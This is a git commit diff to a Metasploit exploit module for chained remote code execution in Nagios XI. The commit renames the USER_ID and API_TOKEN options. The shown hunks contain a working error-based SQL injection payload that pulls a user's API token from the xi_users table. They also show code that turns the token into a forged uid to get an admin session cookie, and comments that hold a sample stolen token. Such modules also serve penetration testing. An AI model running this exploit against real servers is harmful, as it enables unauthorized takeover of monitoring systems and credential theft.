Polish up USER_ID and API_TOKEN options

2016-11-30 14:10:10 -06:00 · 2016-11-30 14:10:10 -06:00 · 3e8cdd1f36
parent 9d2355d128
commit 3e8cdd1f36
1 changed files with 14 additions and 10 deletions
--- a/modules/exploits/linux/http/nagios_xi_chained_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_chained_rce.rb
@ -44,10 +44,11 @@ class MetasploitModule < Msf::Exploit::Remote
        'LHOST'         => Rex::Socket.source_address
      }
    ))
+
    register_options([
-        OptInt.new('USERID', [ true, 'User ID in the database to target', 1 ]),
-        OptString.new('APITOKEN', [ false, 'If an API Token was already stolen, skip the sqli', '8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6gm' ])
-      ], self.class)
+      OptInt.new('USER_ID',      [true, 'User ID in the database to target', 1]),
+      OptString.new('API_TOKEN', [false, 'If an API token was already stolen, skip the SQLi'])
+    ])
  end

  def check
@ -73,8 +74,8 @@ class MetasploitModule < Msf::Exploit::Remote
      fail_with(Failure::NotVulnerable, 'Vulnerable version not found! punt!')
    end

-    unless datastore['APITOKEN'].empty?
-      @api_token = datastore['APITOKEN']
+    if datastore['API_TOKEN']
+      @api_token = datastore['API_TOKEN']
    else
      print_status('Getting API token')
      get_api_token
@ -125,15 +126,17 @@ class MetasploitModule < Msf::Exploit::Remote
      'vars_get' => {
        'mode'   => 'resolve',
        'host'   => '\'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((' \
-                    "SELECT backend_ticket FROM xi_users WHERE user_id=#{datastore['USERID']}" \
+                    "SELECT backend_ticket FROM xi_users WHERE user_id=#{datastore['USER_ID']}" \
                    '),FLOOR(RAND(0)*2))x ' \
                    'FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '
      }
    )
+
+    # default admin token is shorter, ie 27o3b7mu1 shortened to 27o3b7mu
+    # any other user has a longer token, but we cant strip the last char off.
+    # example: 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
    if res && res.body =~ /Duplicate entry '(.*?).'/
-      if $1.length > 8 # default admin token is shorter, ie 27o3b7mu1 shortened to 27o3b7mu
-        # any other user has a longer token, but we cant strip the last char off.
-        # example: 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
+      if $1.length > 8
        res.body =~ /Duplicate entry '(.*?)'/
      end
      @api_token = $1
@ -148,10 +151,11 @@ class MetasploitModule < Msf::Exploit::Remote
      'method'   => 'GET',
      'uri'      => '/nagiosxi/rr.php',
      'vars_get' => {
-        'uid'    => "#{datastore['USERID']}-#{Rex::Text.rand_text_alpha(8)}-" +
+        'uid'    => "#{datastore['USER_ID']}-#{Rex::Text.rand_text_alpha(8)}-" +
                    Digest::MD5.hexdigest(@api_token)
      }
    )
+
    if res && (@admin_cookie = res.get_cookies.split('; ').last)
      vprint_good("Admin cookie: #{@admin_cookie}")
      get_csrf_token(res.body)